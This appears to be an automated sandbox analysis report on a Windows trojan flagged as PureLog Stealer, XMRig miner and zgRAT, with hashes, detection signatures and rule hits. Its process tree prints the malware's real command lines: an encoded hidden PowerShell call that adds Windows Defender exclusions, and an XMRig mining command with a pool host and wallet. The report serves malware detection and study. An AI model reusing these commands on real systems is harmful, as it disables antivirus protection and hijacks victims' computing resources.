Windows
Analysis Report
cybXkFC5nF.exe
Overview
General Information
Field | Value
---|---
Sample name: | cybXkFC5nF.exe (renamed because original name is a hash value)
Original sample name: | 9d82dc826bcac1bdd4c41bf79577af27.exe
Analysis ID: | 1426620
MD5: | 9d82dc826bcac1bdd4c41bf79577af27
SHA1: | c38360ef0e8acb8f34ebe713ab83ce85cf3fe503
SHA256: | 784233bc80ea7857c39dbcd9c929a626093fced8c54224e742c4d0e1d128e80d
Tags: | 64, exe, trojan
Infos: | 
Detection
PureLog Stealer, Xmrig, zgRAT
Field | Value
---|---
Score: | 100
Range: | 0 - 100
Whitelisted: | false
Confidence: | 100%
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Xmrig
Yara detected PureLog Stealer
Yara detected Xmrig cryptocurrency miner
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Bypasses PowerShell execution policy
Detected Stratum mining protocol
Encrypted powershell cmdline option found
Found strings related to Crypto-Mining
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected PersistenceViaHiddenTask
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious Execution of Powershell with Base64
Stores large binary data to the registry
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- cybXkFC5nF.exe (PID: 4956 cmdline: "C:\Users\user\Desktop\cybXkFC5nF.exe" MD5: 9D82DC826BCAC1BDD4C41BF79577AF27)
- powershell.exe (PID: 2492 cmdline: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARQB4AGMAZQBwAHQAaQBvAG4AXABUAHkAcABlAEkAZAAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAIAAtAEYAbwByAGMAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEUAeABjAGUAcAB0AGkAbwBuAFwAVAB5AHAAZQBJAGQALgBlAHgAZQA= MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 5016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- WmiPrvSE.exe (PID: 7280 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
- TypeId.exe (PID: 6532 cmdline: C:\Users\user\AppData\Roaming\Exception\TypeId.exe MD5: 9D82DC826BCAC1BDD4C41BF79577AF27)
- RegAsm.exe (PID: 7204 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe MD5: A4EB36BAE72C5CB7392F2B85609D4A7E)
- AddInProcess.exe (PID: 7476 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 8Bk24tjeWqN6AqpNY25oCTh7a7WhLbFN3TUCo5DUiJn5bfLEr7diNi64q87hchj2t31ikW7jg7YjGNWQkhH9pf9uH7jTPTb.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50 MD5: 929EA1AF28AFEA2A3311FD4297425C94)
- TypeId.exe (PID: 7672 cmdline: C:\Users\user\AppData\Roaming\Exception\TypeId.exe MD5: 9D82DC826BCAC1BDD4C41BF79577AF27)
- TypeId.exe (PID: 3796 cmdline: C:\Users\user\AppData\Roaming\Exception\TypeId.exe MD5: 9D82DC826BCAC1BDD4C41BF79577AF27)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link
---|---|---|---|---
xmrig | According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted applications (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information. | No Attribution | | 
zgRAT | zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an infostealer use which targets browser information and cryptowallets. Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on. | No Attribution | | 
No configs have been found.
Source | Rule | Description | Author | Strings
---|---|---|---|---
 | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | 

Source | Rule | Description | Author | Strings
---|---|---|---|---
 | JoeSecurity_PersistenceViaHiddenTask | Yara detected PersistenceViaHiddenTask | Joe Security | 
 | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | 
 | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | 
 | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | 
 | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | 

(43 entries in total; only the first five are shown.)

Source | Rule | Description | Author | Strings
---|---|---|---|---
 | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | 
 | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | 
 | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | 
 | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | 
 | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | 

(52 entries in total; only the first five are shown.)
Category | Source | Author
---|---|---
Bitcoin Miner | | Joe Security
System Summary | | Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)
System Summary | | Florian Roth (Nextron Systems)